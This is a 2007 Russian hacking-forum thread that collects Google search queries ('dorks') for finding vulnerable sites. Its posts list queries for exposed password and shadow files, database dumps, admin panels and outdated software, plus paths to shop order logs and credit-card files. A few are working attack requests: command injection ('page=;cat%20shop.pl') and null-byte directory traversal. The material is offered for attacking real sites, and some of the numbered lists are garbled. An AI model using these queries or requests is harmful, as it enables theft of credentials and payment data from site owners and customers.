Мега Сбор по Гугл Хакингу

Discussion in 'Уязвимости' started by alextoun, 30 Aug 2007.

  1. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    646
    Likes Received:
    216
    Reputations:
    96
    Кажись не совсем статья а запросы в гугл, с помощью которых можно вытащить стока всякого хлама, что вам и не снилось.(думаю вы знаете как это использовать, т.к об этом было несколько поверхносных постов)
    Ну собственно поехали


    Многие админы оставляют открытыми такие директории:
    в
    этих директориях мы за частую можем найти такие файлы как

    и т .д и т.п

    Замечу, это далеко не всё.
    И даже из этого можно вытянуть уйму всего.
    Фантазируем :)
     
    #1 alextoun, 30 Aug 2007
    Last edited: 30 Aug 2007
    14 people like this.
  2. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    583
    Likes Received:
    130
    Reputations:
    -13
    Хм...наткнулся на одну сцылку может одно и тоже имхо есть оттуда чё добавить:
    Code:
    http://gray-world.net/etc/passwd/googletut1.txt
     
    1 person likes this.
  3. Фещ

    Фещ Banned

    Joined:
    20 Aug 2007
    Messages:
    127
    Likes Received:
    91
    Reputations:
    -11
    молодец что все вместе собрал ) пригодиться )
     
  4. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    120
    Likes Received:
    89
    Reputations:
    1
    Не в обиду, но вот именно что:
    .. действительно что то интересное, поднять едва ли получится. За старания плюс ;)
     
    #4 WAR!9G, 30 Aug 2007
    Last edited: 30 Aug 2007
  5. T0p

    T0p Elder - Старейшина

    Joined:
    28 Dec 2006
    Messages:
    78
    Likes Received:
    16
    Reputations:
    6
    хех можно в сторону бекапов, дампов и прочих там users.sql покопать
     
  6. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    621
    Likes Received:
    97
    Reputations:
    -10
    Code:
    comment:advisories and vulnerabilities*-----
    "1999-2004 FuseTalk Inc" -site:fusetalk.com
    "2003 DUware All Rights Reserved"
    "Active Webcam Page" inurl:8080
    "BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"
    "BosDates Calendar System " "powered by BosDates v3.2 by BosDev"
    "Copyright © 2002 Agustin Dondo Scripts"
    "delete entries" inurl:admin/delete.asp
    "driven by: ASP Message Board"
    "Enter ip" inurl:"php-ping.php"
    "IceWarp Web Mail 5.3.0" "Powered by IceWarp"
    "Ideal BB Version: 0.1" -idealbb.com
    "inurl:/site/articles.asp?idcategory="
    "Obtenez votre forum Aztek" -site:forum-aztek.com
    "Online Store - Powered by ProductCart"
    "Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
    "Powered by A-CART"
    "Powered by AJ-Fork v.167"
    "powered by antiboard"
    "Powered by Coppermine Photo Gallery"
    "Powered by CubeCart"
    "Powered by DCP-Portal v5.5"
    "Powered by DMXReady Site Chassis Manager" -site:dmxready.com
    "Powered by FUDforum"
    "Powered by Gallery v1.4.4"
    "Powered by IceWarp Software" inurl:mail
    "Powered by Ikonboard 3.1.1"
    "Powered by Megabook *" inurl:guestbook.cgi
    "Powered by MercuryBoard [v1"
    "powered by minibb" -site:www.minibb.net -intext:1.7f
    "Powered by My Blog" intext:"FuzzyMonkey.org"
    "Powered by ocPortal" -demo -ocportal.com
    "powered by phpWebSite" 0.9-3-2...4
    "Powered by PowerPortal v1.3"
    "powered by vbulletin 3.0"
    "Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq
    "Powered by WowBB" -site:wowbb.com
    "Powered by YaPig V0.92b"
    "Powered by yappa-ng"
    "running: Nucleus v3.1" -.nucleuscms.org -demo
    "SquirrelMail version 1.4.4" inurl:src ext:php
    "This page has been automatically generated by Plesk Server Administrator"
    +"Powered by Invision Power Board v2.0.0..2"
    +"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
    inurl:"dispatch.php?atknodetype" | inurl:class.at -----Achievo webbased project management-----
    allintitle:aspjar.com guestbook
    inurl:"/becommunity/community/index.php?pageurl=" -----E-market remote code execution-----
    inurl:custva.asp -----EarlyImpact Productcart-----
    ext:php intext:"Powered by phpNewMan Version"
    ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
    filetype:cgi inurl:nbmember.cgi
    filetype:cgi inurl:pdesk.cgi
    filetype:cgi inurl:tseekdir.cgi
    filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
    intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com
    intitle:"EMUMAIL - Login" "Powered by EMU Webmail"
    intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)
    intitle:"View Img" inurl:viewimg.php
    intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse
    intitle:"WordPress > * > Login form" inurl:"wp-login.php"
    intitle:guestbook "advanced guestbook 2.2 powered"
    intitle:welcome.to.horde
    inurl:"/cgi-bin/loadpage.cgi?user_id="
    inurl:"/site/articles.asp?idcategory="
    inurl:"comment.php?serendipity"
    inurl:"messageboard/Forum.asp?"
    inurl:"slxweb.dll"
    inurl:/SiteChassisManager/
    inurl:cal_make.pl
    inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
    inurl:comersus_message.asp
    inurl:directorypro.cgi
    inurl:gotoURL.asp?url=
    inurl:technote inurl:main.cgi*filename=*
    inurl:ttt-webmaster.php
    inurl:wiki/MediaWiki
    "Powered by Invision Power Board(U) v1.3 Final" -----Invision Power Board SSI.PHP SQL Injection-----
    "Powered by mnoGoSearch - free web search engine software" -----nGoSearch vulnerability-----
    "FC Bigfeet" -inurl:mail -----Quicksite demopages for Typo3-----
    inurl:com_remository -----ReMOSitory module for Mambo-----
    uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album
    "Powered by: vBulletin * 3.0.1" inurl:newreply.php -----vBulletin version 3.0.1 newreply.php XSS-----
    filetype:asp inurl:"shopdisplayproducts.asp" -----VP-ASP Shopping Cart XSS-----
    inurl:/cgi-bin/index.cgi inurl:topics inurl:viewcat= +intext:"WebAPP" -site:web-app.org -----WebAPP directory traversal-----
    "FrontPage-" inurl:service.pwd
    " Dumping data for table" 
    "phpMyAdmin MySQL-Dump" filetype:txt
    "1999-2004 FuseTalk Inc" -site:fusetalk.com
    "4images Administration Control Panel"
    "ASP.NET_SessionId" "data source="
    "Active Webcam Page" inurl:8080
    "AnWeb/1.42h" intitle:index.of
    "BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"
    "CERN httpd 3.0B (VAX VMS)"
    "Certificate Practice Statement" inurl:(PDF | DOC)
    "Copyright (c) Tektronix, Inc." "printer status"
    "Enter ip" inurl:"php-ping.php"
    "FC Bigfeet" -inurl:mail 
    "File Upload Manager v1.3" "rename to"
    "HTTP_FROM=googlebot" googlebot.com "Server_Software="
    "IMail Server Web Messaging" intitle:login
    "Ideal BB Version: 0.1" -idealbb.com
    "Incorrect syntax near"
    "Index of /backup"
    "Index of" rar r01 nfo Modified 2004
    "Internal Server Error" "server at"
    "JRun Web Server" intitle:index.of
    "Login to Usermin" inurl:20000
    "MaXX/3.1" intitle:index.of
    "Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
    "Microsoft-IIS/* server at" intitle:index.of
    "Microsoft-IIS/5.0 server at"
    "More Info about MetaCart Free"
    "Netware * Home" inurl:nav.html
    "Network Vulnerability Assessment Report"
    "OPENSRS Domain Management" inurl:manage.cgi
    "ORA-00933: SQL command not properly ended"
    "ORA-12541: TNS:no listener" intitle:"error occurred"
    "OmniHTTPd/2.10" intitle:index.of
    "OpenSA/1.0.4" intitle:index.of
    "Phaser 6250" "Printer Neighborhood" "XEROX CORPORATION" 
    "Phaser® 740 Color Printer" "printer named: "
    "Phorum Admin" "Database Connection" inurl:forum inurl:admin
    "Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
    "Powered by A-CART"
    "Powered by Coppermine Photo Gallery"
    "Powered by DCP-Portal v5.5"
    "Powered by Duclassified" -site:duware.com
    "Powered by Dudirectory" -site:duware.com
    "Powered by Gallery v1.4.4"
    "Powered by Ikonboard 3.1.1"
    "Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
    "Powered by Link Department"
    "Powered by MercuryBoard [v1"
    "Powered by PHPFM" filetype:php -username 
    "Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq
    "Powered by YaPig V0.92b"
    "Powered by ocPortal" -demo -ocportal.com
    "Powered by yappa-ng"
    "Red Hat Secure/2.0"
    "Request Details" "Control Tree" "Server Variables"
    "Select a database to view" intitle:"filemaker pro"
    "SquirrelMail version 1.4.4" inurl:src ext:php
    "Supplied argument is not a valid MySQL result resource"
    "Switch to table format" inurl:table|plain
    "SysCP - login"
    "The script whose uid is " "is not allowed to access"
    "This file was generated by Nessus"
    "This page has been automatically generated by Plesk Server Administrator"
    "This report was generated by WebLog"
    "Unclosed quotation mark before the character string"
    "VNC Desktop" inurl:5800
    "Warning: Cannot modify header information - headers already sent"
    "Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
    allinurl:/examples/jsp/snp/snoop.jsp
    allinurl:index.htm?cus?audio
    allinurl:install/install.php
    allinurl:intranet admin
    allinurl:servlet/SnoopServlet
    axis storpoint "file view" inurl:/volumes/
    buddylist.blt
    camera linksys inurl:main.cgi
    comment:Files containing juicy info***]
    comment:Files containing usernames
    comment:Pages containing login portals
    comment:Sensitive Directories***]
    comment:Various online devices
    comment:Vulnerable servers
    comment:advisories and vulnerabilities
    data filetype:mdb -site:gov -site:mil
    databasetype. Code : 80004005. Error Description 
    e-mail address filetype:csv csv
    eggdrop filetype:user user
    etc (index.of)
    ext:asp inurl:DUgallery intitle:"3.0" -site:dugallery.com -site:duware.com
    ext:asp inurl:pathto.asp
    ext:cgi intext:"nrg-" " This web page was created on "
    ext:cgi inurl:editcgi.cgi inurl:file=
    ext:cgi inurl:ubb6_test.cgi
    ext:conf inurl:rsyncd.conf -cvs -man
    ext:gho gho
    ext:ini eudora.ini
    ext:ini intext:env.ini
    ext:ldif ldif
    ext:log "Software: Microsoft Internet Information Services *.*"
    ext:mdb inurl:*.mdb  inurl:fpdb shop.mdb
    ext:nsf nsf -gov -mil
    ext:php intext:"Powered by phpNewMan Version"
    ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
    ext:reg "username=*" putty
    ext:txt inurl:dxdiag
    ext:vmx vmx
    ezBOO "Administrator Panel" -cvs
    filetype:QDF QDF
    filetype:asp "Custom Error Message" Category Source
    filetype:asp DBQ=" * Server.MapPath("*.mdb")
    
    
    
     
  7. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    381
    Likes Received:
    194
    Reputations:
    -21
    PHP:
    1. "Index of /admin"
    2. "Index of /password"
    3. "Index of /mail"
    4. "Index of /" +passwd
    5. 
    "Index of /" +password.txt
    6. 
    "Index of /" +.htaccess
    7. index of ftp 
    +.mdb allinurl:/cgi-bin/ +mailto
    8. administrators
    .pwd.index
    9. authors
    .pwd.index
    10. service
    .pwd.index
    11. filetype
    :config web
    12. gobal
    .asax index
    13. allintitle
    "index of/admin"
    14. allintitle"index of/root"
    15. allintitlesensitive filetype:doc
    16. allintitle
    restricted filetype :mail
    17. allintitle
    restricted filetype:doc site:gov
    18. inurlasswd filetype
    :txt
    19. inurl
    :admin filetype:db
    20. inurl
    :iisadmin
    21. inurl
    :"auth_user_file.txt"
    22. inurl:"wwwroot/*."
    23. top secret site:mil
    24. confidential site
    :mil
    25. allinurl
    winnt/system32/ (get cmd.exe)
    26. allinurl:/bash_history
    27. intitle
    :"Index of" .sh_history
    28. intitle
    :"Index of" .bash_history
    29. intitle
    :"index of" passwd
    30. intitle
    :"index of" people.lst
    31. intitle
    :"index of" pwd.db
    32. intitle
    :"index of" etc/shadow
    33. intitle
    :"index of" spwd
    34. intitle
    :"index of" master.passwd
    35. intitle
    :"index of" htpasswd
    36. intitle
    :"index of" members OR accounts
    37. intitle
    :"index of" user_carts OR user_cart
    38. ALTERNATIVE INPUTS
    ====================
    39. _vti_inf.html
    40. service
    .pwd
    41. users
    .pwd
    42. authors
    .pwd
    43. administrators
    .pwd
    44. shtml
    .dll
    45. shtml
    .exe
    46. fpcount
    .exe
    47. 
    default.asp
    48. showcode
    .asp
    49. sendmail
    .cfm
    50. getFile
    .cfm
    51. imagemap
    .exe
    52. test
    .bat
    53. msadcs
    .dll
    54. htimage
    .exe
    55. counter
    .exe
    56. browser
    .inc
    57. hello
    .bat
    58. 
    default.aspdvwssr.dll
    59. cart32
    .exe
    60. add
    .exe
    61. index
    .jsp
    62. SessionServlet
    63. shtml
    .dll
    64. index
    .cfm
    65. page
    .cfm
    66. shtml
    .exe
    67. web_store
    .cgi
    68. shop
    .cgi
    69. upload
    .asp
    70. 
    default.asp
    71. pbserver
    .dll
    72. phf
    73. test
    -cgi
    74. finger
    75. Count
    .cgi
    76. jj
    77. php
    .cgi
    78. php
    79. nph
    -test-cgi
    80. handler
    81. webdist
    .cgi
    82. webgais
    83. websendmail
    84. faxsurvey
    85. htmlscript
    86. perl
    .exe
    87. wwwboard
    .pl
    88. www
    -sql
    89. view
    -source
    90. campas
    91. aglimpse
    92. glimpse
    93. man
    .sh
    94. AT
    -admin.cgi
    95. AT
    -generate.cgi
    96. filemail
    .pl
    97. maillist
    .pl
    98. info2www
    99. files
    .pl
    100. bnbform
    .cgi
    101. survey
    .cgi
    102. classifieds
    .cgi
    103. wrap
    104. cgiwrap
    105. edit
    .pl
    106. perl
    107. names
    .nsf
    108. webgais
    109. dumpenv
    .pl
    110. test
    .cgi
    111. submit
    .cgi
    112. guestbook
    .cgi
    113. guestbook
    .pl
    114. cachemgr
    .cgi
    115. responder
    .cgi
    116. perlshop
    .cgi
    117. query
    118. w3
    -msql
    119. plusmail
    120. htsearch
    121. infosrch
    .cgi
    122. publisher
    123. ultraboard
    .cgi
    124. db
    .cgi
    125. formmail
    .cgi
    126. allmanage
    .pl
    127. ssi
    128. adpassword
    .txt
    129. redirect
    .cgi
    130. cvsweb
    .cgi
    131. login
    .jsp
    132. dbconnect
    .inc
    133. admin
    134. htgrep
    135. wais
    .pl
    136. amadmin
    .pl
    137. subscribe
    .pl
    138. news
    .cgi
    139. auctionweaver
    .pl
    140. 
    .htpasswd
    141. acid_main
    .php
    142. access
    .log
    143. log
    .htm
    144. log
    .html
    145. log
    .txt
    146. logfile
    147. logfile
    .htm
    148. logfile
    .html
    149. logfile
    .txt
    150. logger
    .html
    151. stat
    .htm
    152. stats
    .htm
    153. stats
    .html
    154. stats
    .txt
    155. webaccess
    .htm
    156. wwwstats
    .html
    157. source
    .asp
    158. perl
    159. mailto
    .cgi
    160. YaBB
    .pl
    161. mailform
    .pl
    162. cached_feed
    .cgi
    163. 
    global.cgi
    164. Search
    .pl
    165. build
    .cgi
    166. common
    .php
    167. show
    168. 
    global.inc
    169. ad
    .cgi
    170. WSFTP
    .LOG
    171. index
    .html~
    172. index.php~
    173. index.html.bak
    174. index
    .php.bak
    175. 
    print.cgi
    176. register
    .cgi
    177. webdriver
    178. bbs_forum
    .cgi
    179. mysql
    .class
    180. sendmail.inc
    181. CrazyWWWBoard
    .cgi
    182. search
    .pl
    183. way
    -board.cgi
    184. webpage
    .cgi
    185. pwd
    .dat
    186. adcycle
    187. post
    -query
    188. help
    .cgi
    189. 
    /robots.txt
    190. 
    /admin.mdb
    191. 
    /shopping.mdb
    192. 
    /arg;
    193. /stats/styles.css
    194. 
    /statshelp.htm
    195. 
    /favicon.ico
    196. 
    /stats/admin.mdb
    197. 
    /shopdbtest.asp
    198. 
    /cgi-bin/test.cgi
    199. 
    /cgi-bin/test.pl
    200. 
    /cgi-bin/env.cgi
    201. 
    /photos/protest/styles.css
    202. http
    ://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
    203. /cgi-bin/whereami.cgi
    204. 
    /shopping400.mdb
    205. 
    /cgi/test.cgi
    206. 
    /cgi-bin/test2.pl
    207. 
    /photos/protest/kingmarch_02.html
    208. 
    /chevy/index.htm
    209. 
    /cgi-bin/glocation.cgi
    210. 
    /cgi-bin/test2.cgi
    211. 
    /ccbill/glocation.cgi
    212. 
    /cgi-bin/styles.css
    213. 
    /shopping350.mdb
    214. 
    /cgi-bin/shopper.cgi
    215. 
    /shopadmin.asp
    216. 
    /news_2003-02-27.htm
    217. 
    /cgi-bin/whois.cgi
    218. 3 
    /cgi-bin/calendar.pl
    219. 3 
    /cgi-bin/calendar/calendar.pl
    220. 3 
    /cgibin/styles.css
    221. 3 
    /venem.htm
    222. 2 
    /stats/www.newbauersflowers.com/stats/04-refers.htm
    223. 2 
    /cgi-bin/where.pl
    224. 2 
    /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
    225. 2 
    /cgibin/recon.cgi
    226. 2 
    /cgibin/test.cgi
    227. 2 
    /WebShop/templates/styles.css
    228. 2 
    /stats/shopping350.mdb
    229. 2 
    /cgi-bin/mailform.cgi
    230. 2 
    /cgi-bin/recon.cgi
    231. 2 
    /chevy
    232. 2 
    /cgi-bin/servinfo.cgi
    233. 2 
    /acart2_0.mdb
    234. 2 
    /cgi-bin/where.cgi
    235. 2 
    /chevy/
    236. 2 /stats/www.savethemall.net/stats/19-refers.htm
    237. 2 
    /ccbill/secure/ccbill.log
    238. 2 
    /cgi/recon.cgi
    239. 2 
    /stats/www.gregoryflynn.com/chevy
    240. 2 
    /ibill/glocation.cgi
    241. 2 
    /ccbill/whereami.cgi
    242. 2 
    /ibill/whereami.cgi
    243. 2 
    /apps_trial.htm
    244. 2 
    /cgi-bin/lancelot/recon.cgi
    245. 2 
    /cgi-bin/DCShop/Orders/styles.css
    246. 1 
    /cgi-bin/htmanage.cgi
    247. 1 
    /stats/www.tysons.net/stats/05-refers.htm
    248. 1 
    /cgi-bin/mastergate/add.cgi
    249. 1 
    /cgi-bin/openjournal.cgi
    250. 1 
    /cgi-bin/calendar/calendar_admin.pl
    251. 1 
    /cgibin/ibill/count.cgi
    252. 1 
    /cgi-bin/nbmember2.cgi
    253. 1 
    /cgi-bin/mastergate/count.cgi
    254. 1 
    /cgi-bin/mastergate/accountcreate.cgi
    255. 1 
    /cgi-bin/ibill/accountcreate.cgi
    256. 1 
    /cgibin/MasterGate2/count.cgi
    257. 1 
    /cgi-bin/amadmin.pl
    258. 1 
    /cgibin/mailform.cgi
    259. 1 
    /cgibin/mastergate/count.cgi
    260. 1 
    /cgibin/harvestor.cgi
    261. 1 
    /cgibin/igate/count.cgi
    262. 1 
    /WebShop
    263. 1 
    /shopdisplaycategories.asp
    264. 1 
    /cgi-bin/DCShop/Orders/orders.txt
    265. 1 
    /cgi-bill/revshare/joinpage.cgi
    266. 1 
    /stats/www.gregoryflynn.com/stats/19-refers.htm
    267. 1 
    /cgi-local/DCShop/auth_data/styles.css
    268. 1 
    /cgi-bin/add-passwd.cgi
    269. 1 
    /cgi-bin/MasterGate/count.cgi
    270. 1 
    /apps_shop.htm%20/comersus/database/comersus.mdb
    271. 1 
    /data/verotellog.txt
    272. 1 
    /epwd/ws_ftp.log
    273. 1 
    /stats/www.dialacure.com/stats/16-refers.htm
    274. 1 
    /cgi/MasterGate2/count.cgi
    275. 1 
    /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;stateWY;sect=home;tile=8;ord=57019
    276. 1 
    /wwii/styles.css
    277. 1 
    /cgi-bin/admin.mdb
    278. 1 
    /stats/www.gregoryflynn.com/stats/31-refers.htm
    279. 1 
    /cgi-bin/ibill-tools/count.cgi
    280. 1 
    /WebShop/templates/cc.txt
    281. 1 
    /cgibin/ibill/accountcreate.cgi
    282. 1 
    /cgi-bin/count.cgi
    283. 1 
    /cgi-local/DCShop/auth_data/auth_user_file.txt
    284. 1 
    /cgi/mastergate/count.cgi
    285. 1 
    /cgi-bin/EuroDebit/addusr.pl
    286. 1 
    /cgi-bin/dbm-passwd.cgi
    287. 1 
    /cgi/igate/accountcreate.cgi
    288. 1 
    /cgi-bin/store/Log_files/your_order.log
    289. store
    /log_files/your_order.log
    290. 
    /cgi-bin/DCShop/Orders/orders.txt
    291. 
    /vpasp/shopdbtest.asp
    292. 
    /orders/checks.txt
    293. 
    /WebShop/logs
    294. 
    /ccbill/secure/ccbill.log
    295. 
    /scripts/cart32.exe
    296. 
    /cvv2.txt
    297. 
    /cart/shopdbtest.asp
    298. 
    /cgi-win/cart.pl
    299. 
    /shopdbtest.asp
    300. 
    /WebShop/logs/cc.txt
    301. 
    /cgi-local/cart.pl
    302. 
    /PDG_Cart/order.log
    303. 
    /config/datasources/expire.mdb
    304. 
    /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
    305. 
    /orders/orders.txt
    306. 
    /cgis/cart.pl
    307. 
    /webcart/carts
    308. 
    /cgi-bin/cart32.exe/cart32clientlist
    309. 
    /cgi/cart.pl
    310. 
    /comersus/database/comersus.mdb
    311. 
    /WebShop/templates/cc.txt
    312. 
    /Admin_files/order.log
    313. 
    /orders/mountain.cfg
    314. 
    /cgi-sys/cart.pl
    315. 
    /scripts/cart.pl
    316. 
    /htbin/cart.pl
    317. 
    /productcart/database/EIPC.mdb
    318. 
    /shoponline/fpdb/shop.mdb
    319. 
    /config/datasources/myorder.mdb
    320. 
    /PDG_Cart/shopper.conf
    321. 
    /shopping/database/metacart.mdb
    322. 
    /bin/cart.pl
    323. 
    /cgi-bin/cart32.ini
    324. 
    /database/comersus.mdb
    325. 
    /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
    326. 
    /cgi-bin/store/Admin_files/myorderlog.txt
    327. 
    /cgi-bin/orders.txt
    328. 
    /cgi-bin/store/Admin_files/your_order.log
    329. 
    /test/test.txt
    330. 
    /fpdb/shop.mdb
    331. 
    /cgibin/shop/orders/orders.txt
    332. 
    /shopadmin1.asp
    333. 
    /cgi-bin/shop.cgi
    334. 
    /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
    335. 
    /cgi-bin/PDG_cart/card.txt
    336. 
    /shopper.cgi?preadd=action&key=PROFA&template=order1.log
    337. 
    /store/shopdbtest.asp
    338. 
    /log_files/your_order.log
    339. 
    /_database/expire.mdb
    340. 
    /HyperStat/stat_what.log
    341. 
    /cgibin/DCShop/auth_data/auth_user_file.txt
    342. 
    /htbin/orders/orders.txt
    343. 
    /SHOP/shopadmin.asp
    344. 
    /index.cgi?page=../admin/files/order.log
    345. 
    /vpshop/shopadmin.asp
    346. 
    /webcart/config
    347. 
    /PDG/order.txt
    348. 
    /cgi-bin/shopper.cgi
    349. 
    /orders/order.log
    350. 
    /orders/db/zzzbizorders.log.html
    351. 
    /easylog/easylog.html
    352. 
    /cgi-bin/store/Log_files/your_order.log
    353. 
    /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
    354. 
    /comersus_message.asp?
    355. /orders/import.txt
    356. 
    /htbin/DCShop/auth_data/auth_user_file.txt
    357. 
    /admin/html_lib.pl
    358. 
    /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
    359. 
    /cgi-bin/DCShop/auth_data/auth_user_file.txt
    360. 
    /cgi-bin/shop.pl/page=;cat%20shop.pl
    361. 
    /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
    362. 
    /HBill/htpasswd
    363. 
    /bin/shop/auth_data/auth_user_file.txt
    364. 
    /cgi-bin/cs/shopdbtest.asp
    365. 
    /mysql/shopping.mdb
    366. 
    /Catalog/config/datasources/Products.mdb
    367. 
    /trafficlog
    368. 
    /cgi/orders/orders.txt
    369. 
    /cgi-local/PDG_Cart/shopper.conf
    370. 
    /store/cgi-bin/Admin_files/expire.mdb
    371. 
    /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
    372. 
    /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
    373. 
    /cgi-bin/mc.txt
    374. 
    /cgi-bin/mall2000.cgi
    375. 
    /cgi-win/DCShop/auth_data/auth_user_file.txt
    376. 
    /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
    377. 
    /store/commerce.cgi
    378. 
    /scripts/shop/orders/orders.txt
    379. 
    /product/shopping350.mdb
    380. 
    /super_stats/access_logs
    381. 
    /cgi-local/orders/orders.txt
    382. 
    /cgi-bin/PDG_Cart/mc.txt
    383. 
    /cgibin/cart32.exe
    384. 
    /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
    385. 
    /cgibin/password.txt
    386. 
    /Catalog/cart/carttrial.dat
    387. 
    /catalog/Admin/Admin.asp
    388. 
    /ecommerce/admin/user/admin.asp
    389. 
    /data/productcart/database/EIPC.mdb
    390. 
    /store/admin_files/commerce_user_lib.pl
    391. 
    /cgi-bin/store/index.cgi
    392. 
    /paynet.txt
    393. 
    /config/datasources/store/billing.mdb
    394. 
    /_database/shopping350.mdb
    395. 
    /cgi-bin/shopper.exe?search
    396. 
    /cgi/shop.pl/page=;cat%20shop.pl
    397. 
    /cgi-bin/store/Admin_files/orders.txt
    398. 
    /cgi-bin/store/commerce_user_lib.pl
    399. 
    /cgi-sys/pagelog.cgi
    400. 
    /cgi-sys/shop.pl/page=;cat%20shop.pl
    401. 
    /scripts/weblog
    402. 
    /fpdb/shopping400.mdb
    403. 
    /htbin/shop/orders/orders.txt
    404. 
    /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
    405. 
    /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
    406. 
    /mall_log_files/
    407. /cgi-bin/perlshop.cgi
    408. 
    /tienda/shopdbtest.asp
    409. 
    /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
    410. 
    /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
    411. 
    /WebShop/logs/ck.log
    412. 
    /fpdb/shopping300.mdb
    413. 
    /mysql/store.mdb
    414. 
    /cgi-bin/store/Admin_files/commerce_user_lib.pl
    415. 
    /config.dat
    416. 
    /order/order.log
    417. 
    /commerce_user_lib.pl
    418. 
    /Admin_files/AuthorizeNet_user_lib.pl
    419. 
    /cvv2.asp
    420. 
    /cgi-bin/cart32/CART32-order.txt
    421. 
    /wwwlog
    422. 
    /cool-logs/mlog.html
    423. 
    /cgi-bin/pass/merchant.cgi.log
    424. 
    /cgi-local/pagelog.cgi
    425. 
    /cgi-bin/pagelog.cgi
    426. 
    /cgi-bin/orders/cc.txt
    427. 
    /cgis/shop/orders/orders.txt
    428. 
    /admin/admin_conf.pl
    429. 
    /cgi-bin/pdg_cart/order.log
    430. 
    /cgi/PDG_Cart/order.log
    431. 
    /Admin_files/ccelog.txt
    432. 
    /cgi-bin/orders/mc.txt
    433. 
    /cgi/cart32.exe
    434. 
    /ecommerce/admin/admin.asp
    435. 
    /scripts/DCShop/auth_data/auth_user_file.txt
    436. 
    /Catalog/config/datasources/Expire.mdb
    437. 
    /ecommerce/admin/shopdbtest.asp
    438. 
    /mysql/mystore.mdb
    439. 
    /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
    440. 
    /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
    441. 
    /cgi-bin/Count.cgi?df=callcard.dat
    442. 
    /logfiles/
    443. /shopping/shopping350.mdb
    444. 
    /admin/configuration.pl
    445. 
    /cgis/DCShop/auth_data/auth_user_file.txt
    446. 
    /cgis/cart32.exe
    447. 
    /cgi-bin/dcshop.cgi
    448. 
    /cgi-win/shop/auth_data/auth_user_file.txt
    449. 
    /shopping400.mdb
    450. 
    /HBill/config
    451. 
    /cgi-bin/shop/index.cgi?page=../admin/files/order.log
    452. 
    /search=action&keywords=GSD%20&template=order.log
    453. 
    /WebCart/orders.txt
    454. 
    /PDG_Cart/authorizenets.txt
    455. 
    /cgi-bin/AnyForm2
    456. 
    /~gcw/cgi-bin/Count.cgi?df=callcard.dat
    457. 
    /cgi-bin/PDG_Cart/order.log
    458. 
    /expire.mdb
    459. 
    /logger/
    460. /webcart-lite/orders/import.txt
    461. 
    /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
    462. 
    /cgi-bin/PDG_Cart/shopper.conf
    463. 
    /cgi-bin/cart32.exe
    464. 
    /dc/orders/orders.txt
    465. 
    /cgi-local/DCShop/orders/orders.txt
    466. 
    /shop.pl/page=shop.cfg
    467. 
    /cgi-local/cart32.exe
    468. 
    /cgi-win/pagelog.cgi
    469. 
    /cgi-win/shop/orders/orders.txt
    470. 
    /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
    471. 
    /cgi-sys/DCShop/auth_data/auth_user_file.txt
    472. 
    /cgi-bin/www-sql;;;
    473. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
    474. 
    /scripts/orders/orders.txt
    475. 
    /cgi-local/shop.pl/shop.cfg
    476. 
    /search=action&keywords=cwtb%20&template=expire.mdb
    477. 
    /php/mylog.phtml
    478. 
    /config/datasources/shopping.mdb
    479. 
    /php-coolfile/action.php?action=edit&file=config.php
    480. 
    /cgi-bin/ezmall2000/mall2000.cgi
    481. 
    /cgi/DCShop/orders/orders.txt
    482. 
    /cgi-local/shop.pl
    483. 
    /cgis/DCShop/orders/orders.txt
    484. 
    /product/shopdbtest.asp
    485. 
    /ASP/cart/database/metacart.mdb
    486. 
    /cgi-bin/cgi-lib.pl
    487. 
    /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
    488. 
    /search=action&keywords=cwtb%20&template=order.log
    489. 
